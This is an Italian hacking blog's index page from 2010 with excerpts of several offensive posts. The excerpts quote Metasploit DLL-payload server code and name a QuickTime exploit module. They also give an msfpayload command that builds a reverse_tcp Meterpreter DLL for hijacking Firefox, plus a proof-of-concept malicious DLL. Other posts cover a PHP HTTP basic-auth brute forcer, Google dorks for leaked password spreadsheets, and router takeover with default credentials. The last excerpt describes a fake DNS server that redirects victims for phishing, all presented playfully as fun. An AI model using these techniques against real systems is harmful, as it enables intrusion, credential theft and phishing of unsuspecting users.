Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Post autore:

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D


Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end


(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 2 Comments »

[MOAUB]Oday on Exploit-DB(Cpanel<=11.25 and Adobe [Flash Player/Acrobat] )

settembre 1st, 2010 by clshack

E parte finalmente questo fantastico progetto:

The Abysssec Security Team is about to unleash its Month Of Abysssec Undisclosed Bugs on us. Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. The 0day collection includes PoCs and Exploits for Microsoft Excel, Internet Explorer, Microsoft codecs, Cpanel and others. The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride. Follow both the exploit-db and Abysssec twitter feed to keep updated!

Ed ecco gli oday di settembre by Abysssec:
Title : Cpanel PHP Restriction Bypass Vulnerability
Version : < = 11.25
Discovery : http://www.abysssec.com
Vendor : http://www.cpanel.net
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.It can help attacker to bypass restriction such as mod_security , Safemod and disable functions.

(continua...)

Tags: , , , ,
Posted in Hacking | 7 Comments »

Search Engines for Penetration Testers and Crackers

settembre 1st, 2010 by clshack

Nella Defcon 18(DEF CON® Hacking Conference) si è parlato di SHODAN,che non è altro che un motore di ricerca, molto diverso però dai soliti, bing google,yahoo ecc.

Con SHODAN, possiamo filtrare i risultati per porta, per server, per continente,cercare password… web applicazioni “old”,router,ftp e molto altro ancora…cercando nelle risposte che il server ci da, ad esempio “Server: iis 5″
Dal sito ufficiale:

SHODAN is a computer search engine. But it is unlike any other search engine. While other search engines scour the web for content, SHODAN scans for information about the sites themselves. The result is a search engine that aggregates banners from well-known services. This presentation will focus on the applications of SHODAN to penetration testers, and in particular will detail a number of case studies demonstrating passive vulnerability analysis including default passwords, descriptive banners, and complete pwnage. For penetration testers, SHODAN is a game-changer, and a goldmine of potential vulnerabilities.

Michael Schearer (“theprez98″) is a government contractor who spent nearly nine years in the United States Navy as a combat-experienced EA-6B Prowler Electronic Countermeasures Officer. He also spent nine months on the ground doing counter-IED work with the U.S. Army. He is a graduate of Georgetown University’s National Security Studies Program and a previous presenter at DEFCON, and has spoken at ShmooCon, HOPE and internationally at CONFidence (Poland) and HackCon (Norway) as well as other numerous conferences. Michael is a licensed amateur radio operator and an active member of the Church of WiFi. He lives in Maryland with his wife and four children.

Anche con google, come saprete si possono filtrare i risultati le famose dork .

Ad esempio con google o.o se cerchiamo:
inurl:"password" filetype:xls
Beh ci piombano fuori password di mediaset, megaupload,rapidshare,tim,vodafone,aruba e altre cazzate :D che il nostro amico google indicizza.
(continua…)

Tags: , , , ,
Posted in Hacking, Servizi WEB | 4 Comments »

Apple QuickTime <= 7.7.7 “_Marshaled_pUnk” Remote Code Execution

agosto 31st, 2010 by clshack

Il 12 agosto 2010 è stata fixata con la versione 7.6.7 di QuickTime una falla critica che permetteva l’esecuzione di codice remoto sul pc vittima.

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

Ora il 31 agosto 2010, QuickTime soffre ancora e mette a repentaglio la sicurezza degli utenti.

Vediamo come sfruttare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_marshaled_punk
(continua…)

Tags: , , , , , ,
Posted in Hacking | 7 Comments »

[Metasploit] multi/handler :D

agosto 30th, 2010 by clshack

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll


Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

Stage Finito eeeeeeeeeeee PROMOSSO

agosto 30th, 2010 by clshack

Questa estate, è passata troppo velocemente :(

Purtroppo non ho potuto dedicare al blog tutto il tempo che volevo :(

Dal 28 giugno al 27 agosto 2010 ho fatto uno stage informatico :D

E’ stata una bella esperienza e ringrazio tutti i miei colleghi* con cui ho condiviso quasi 2 mesi a questa parte, che mi hanno saputo ascoltare, insegnare, aiutare a crescere e mi fatto sorridere :D

  • Andrea Arcangeli;
  • Davide Remelli;
  • Davide Bordiga;
  • Sabina Bosco;
  • Monica Ramponi;
  • Emanuele Dal Gal;
  • Federica Candotti;
  • Luca Marin;

Buon lavoro ragazzi :D
Oltre allo stage che occupava le mie giornate, dovevo studiare italiano perchè il professore mi ha rimandato -.-’
Beh l’esame è stato superato :D
Quindi sono stato promosso siiiiiiiiiiiiiiiiiiiiiiiii :D

Ringrazio anche i visitatori del blog, che da giugno ad agosto, hanno visualizzato oltre 180 mila pagine :D

Ora posso godermi un po’ le vacanze :D => no-.-’ devo andare a calcio :D

Posted in Off-Topic | 4 Comments »

[Remote-Router]Fake DNS and Phishing/Exploiting attack

agosto 29th, 2010 by clshack

In pochissimi, cambiano la password al router -.-’ per comodità si lascia quella di default, quella facile da ricordare o.O

User: admin
Password: admin

In questo modo, se il router è raggiungibile dall’esterno, oppure se un utente, riesce ad entrare nella nostra rete può sfruttando i dns effettuare attacchi mirati verso il vostro il pc :D
Gli attacchi vanno dal phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

fino a per prendere il controllo remoto del pc vittima :D

Tutto questo sfruttando i dns.
Quando riusciamo ad entrare nei router, oltre a cambiare l’ssid del wifi in “Che stronzo che sie” / “Sei un merda” e stronzate varie possiamo cambiare i dns.
Ad esempio io ho quelli di google o.O

I server dns, volgarmente parlando, non fanno altro che restituire l’ip del sito internet a cui ci stiamo connettendo, ad esempio se digitiamo www.clshack.it:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.it
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.it. IN A
;; ANSWER SECTION:
www.clshack.it. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Ci restituisce:
94.141.22.26
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Programmazione, Software | 20 Comments »

[PHP]BruteForce Http basic authentication

agosto 25th, 2010 by clshack

Subito avevo scritto questo scanner in python, poi non riuscivo a gestire bene l’eccezzione httplib.badstatus e quindi ho converti lo scanner in php :D è è è esercizio :D

La configurazione dello scanner è ababstanza semplice, per l’autentificazione, ho usato i la libreria curl di php ;)

La funzione per fare un login in , con i curl è:

function authentication($ip,$user,$password)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL,$ip);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_NOBODY, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
	curl_setopt($ch,CURLOPT_USERPWD, "$user:$password");
	curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
	curl_exec($ch);
	$info =curl_getinfo($ch);
	curl_close ($ch);
	if($info["http_code"]=="200")
        {
		return 1;
        }
	else
        {
		return 0;
         }
}


Codice abbastanza semplice :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Programmazione, Software | 13 Comments »

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

agosto 25th, 2010 by clshack

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}


(continua…)

Tags: , , ,
Posted in Hacking, Software | 22 Comments »

[PYTHON]Fake DNS Server

agosto 20th, 2010 by clshack

Semplice server dns, che mi è servito per un attacco a dei router :D ne parlerò presto, basato su questo codice.
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
L’ho praticamente riscritto a modo mio, togliendo le classi,aggiungendo alcune opzioni.

La configurazione è molto semplice ;)

Basta modificare la prima riga:

fake=['www.facebook.com','127.0.0.1','www.google.it','127.0.0.1']

E’ un array*, si usa così:
#host =>fake ip response

Agli indirizzi non imposti verrà assegnato il loro vero ip, cosi nessuno si accorgerà di niente :D
Un esempio:
(Windows non centra niente, era solo per farvi vedere che era su un altro pc ;) l’attacco funziona su qualsiasi computer ameno che non abbiano la cache dns e cose simili, per velocizzare la navigazione)

Buon divertimento e aspettate il prossimo articolo :D

DOWNLOAD

Tags: , , ,
Posted in Hacking, Programmazione | 3 Comments »
« Older Entries